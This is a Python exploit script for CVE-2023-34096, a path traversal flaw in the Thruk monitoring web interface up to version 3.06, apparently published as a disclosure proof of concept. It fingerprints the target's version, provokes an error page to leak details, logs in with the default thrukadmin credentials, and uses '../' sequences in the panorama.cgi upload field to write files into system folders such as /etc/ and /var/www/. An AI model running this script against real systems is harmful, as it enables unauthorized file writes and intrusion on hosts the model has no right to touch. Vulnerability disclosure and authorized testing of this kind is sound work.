# Exploit Title: Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06 # Date: 08-Jun-2023 # Exploit Author: Galoget Latorre (@galoget) # CVE: CVE-2023-34096 (Galoget Latorre) # Vendor Homepage: https://thruk.org/ # Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip # Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096 # CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html # GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h # Affected Versions: <= 3.06 # Language: Python 3.x # Tested on: # - Ubuntu 22.04.5 LTS 64-bit # - Debian GNU/Linux 10 (buster) 64-bit # - Kali GNU/Linux 2023.1 64-bit # - CentOS GNU/Linux 8.5.2111 64-bit #!/usr/bin/python3 # -*- coding:utf-8 -*- import sys import warnings import requests from bs4 import BeautifulSoup from termcolor import cprint # Usage: python3 exploit.py <target.site> # Example: python3 exploit.py http://127.0.0.1/thruk/ # Disable warnings warnings.filterwarnings('ignore') # Set headers headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" } def banner(): """ Function to print the banner """ banner_text = """ __ __ __ __ __ __ __ __ __ __ / \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__ \\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__) Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06 Exploit & CVE Author: Galoget Latorre (@galoget) LinkedIn: https://www.linkedin.com/in/galoget """ print(banner_text) def usage_instructions(): """ Function that validates the number of arguments. The application MUST have 2 arguments: - [0]: Name of the script - [1]: Target URL (Thruk Base URL) """ if len(sys.argv) != 2: print("Usage: python3 exploit.py <target.site>") print("Example: python3 exploit.py http://127.0.0.1/thruk/") sys.exit(0) def check_vulnerability(thruk_version): """ Function to check if the recovered version is vulnerable to CVE-2023-34096. Prints additional information about the vulnerability. """ try: if float(thruk_version[1:5]) <= 3.06: if float(thruk_version[4:].replace("-", ".")) < 6.2: cprint("[+] ", "green", attrs=['bold'], end = "") print("This version of Thruk is ", end = "") cprint("VULNERABLE ", "red", attrs=['bold'], end = "") print("to CVE-2023-34096!") print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html") print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h") print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096") print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096") print(" | Thruk Changelog: https://www.thruk.org/changelog.html") print(" | Fixed version: 3.06-2+") print("") return True else: cprint("[-] ", "red", attrs=['bold'], end = "") print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.") return False except: cprint("[-] ", "red", attrs=['bold'], end = "") print("There was an error parsing Thruk's version.\n") return False def get_thruk_version(): """ Function to get Thruk's version via web scraping. It also verifies the title of the website to check if the target is a Thruk instance. """ response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10) html_soup = BeautifulSoup(response.text, "html.parser") if "<title>Thruk Monitoring Webinterface</title>" not in response.text: cprint("[-] ", "red", attrs=['bold'], end = "") print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.") sys.exit(-1) else: # Extract version anchor tag version_link = html_soup.find_all("a", {"class": "link text-sm"}) if len(version_link) == 1 and version_link[0].has_attr('href'): thruk_version = version_link[0].text.strip() cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Detected Thruk Version (Public Banner): {thruk_version}\n") return thruk_version else: cprint("[-] ", "red", attrs=['bold'], end = "") print("There was an error retrieving Thruk's version.") sys.exit(-1) def get_error_info(): """ Function to cause an error in the target Thruk instance and collect additional information via web scraping. """ # URL that will cause an error error_url = target + "//cgi-bin/login.cgi" # Retrieve Any initial Cookies error_response = requests.get(error_url, headers=headers, allow_redirects=False, verify=False, timeout=10) cprint("[*] ", "blue", attrs=['bold'], end = "") print("Trying to retrieve additional information...\n") try: # Search for the error tag html_soup = BeautifulSoup(error_response.text, "html.parser") error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text if len(error_report) > 0: # Print Error Info error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")] cprint("[+] ", "green", attrs=['bold'], end = "") print("Recovered Information: \n") parsed_error_report = error_report.split("\n") for error_line in parsed_error_report: print(f" {error_line}") except: cprint("[-] ", "red", attrs=['bold'], end = "") print("No additional information available.\n") def get_thruk_session_auto_login(): """ Function to login into the Thruk instance and retrieve a valid session. It will use default Thruk's credentials available here: - https://www.thruk.org/documentation/install.html Change credentials if required. """ # Default Credentials - Change if required username = "thrukadmin" # CHANGE ME password = "thrukadmin" # CHANGE ME params = {"login": username, "password": password} cprint("[*] ", "blue", attrs=['bold'], end = "") print(f"Trying to autenticate with provided credentials: {username}/{password}\n") # Define Login URL login_url = "cgi-bin/login.cgi" session = requests.Session() # Retrieve Any initial Cookies session.get(target, headers=headers, allow_redirects=True, verify=False) # Login and get thruk_auth Cookie session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False) # Get Cookies as dictionary cookies = session.cookies.get_dict() # Successful Login if cookies.get('thruk_auth') is not None: cprint("[+] ", "green", attrs=['bold'], end = "") print("Successful Authentication!\n") cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n") return session # Failed Login else: if cookies.get('thruk_message') == "fail_message~~login%20failed": cprint("[-] ", "red", attrs=['bold'], end = "") print("Login Failed, check your credentials.") sys.exit(401) def cve_2023_34096_exploit_path_traversal(logged_session): """ Function that attempts to exploit the Path Traversal Vulnerability. The exploit will try to upload a PoC file to multiple common folders. This to prevent permissions errors to cause false negatives. """ cprint("[*] ", "blue", attrs=['bold'], end = "") print("Trying to exploit: ", end = "") cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold']) # Define Upload URL upload_url = "cgi-bin/panorama.cgi" # Absolute paths common_folders = ["/tmp/", "/etc/thruk/plugins/plugins-enabled/", "/etc/thruk/panorama/", "/etc/thruk/bp/", "/etc/thruk/thruk_local.d/", "/var/www/", "/var/www/html/", "/etc/", ] # Upload PoC file to each folder for target_folder in common_folders: # PoC file extension is jpg due to regex validations of Thruk. # Nevertheless this issue can still cause damage in different ways to the affected instance. files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")} data = {"task": "upload", "type": "image", "location": f"backgrounds/../../../..{target_folder}" } upload_response = logged_session.post(target + upload_url, data=data, files=files, headers=headers, allow_redirects=False, verify=False) try: upload_response = upload_response.json() if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True: cprint("[+] ", "green", attrs=['bold'], end = "") print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n") elif upload_response.get("msg") == "Fileupload must use existing and writable folder.": cprint("[-] ", "red", attrs=['bold'], end = "") print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n") else: cprint("[-] ", "red", attrs=['bold'], end = "") print("File upload failed.\n") except: cprint("[-] ", "red", attrs=['bold'], end = "") print("File upload failed.\n") if __name__ == "__main__": banner() usage_instructions() # Change this with the domain or IP address to attack if sys.argv[1] and sys.argv[1].startswith("http"): target = sys.argv[1] else: target = "http://127.0.0.1/thruk/" # Prepare Base Target URL if not target.endswith('/'): target += "/" cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Target URL: {target}\n") # Get Thruk version via web scraping scraped_thruk_version = get_thruk_version() # Send a request that will generate an error and collect extra info get_error_info() # Check if the instance is vulnerable to CVE-2023-34096 vulnerable_status = check_vulnerability(scraped_thruk_version) if vulnerable_status: cprint("[+] ", "green", attrs=['bold'], end = "") print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?") # Confirm exploitation option = input("\nChoice (Y/N): ").lower() print("") if option == "y": cprint("[*] ", "blue", attrs=['bold'], end = "") print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n") # Login into Thruk instance valid_session = get_thruk_session_auto_login() # Exploit Path Traversal Vulnerability cve_2023_34096_exploit_path_traversal(valid_session) elif option == "n": cprint("[*] ", "blue", attrs=['bold'], end = "") print("No exploitation attempts were performed, Goodbye!\n") sys.exit(0) else: cprint("[-] ", "red", attrs=['bold'], end = "") print("Unknown option entered.") sys.exit(1) else: cprint("[-] ", "red", attrs=['bold'], end = "") print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.") sys.exit(2)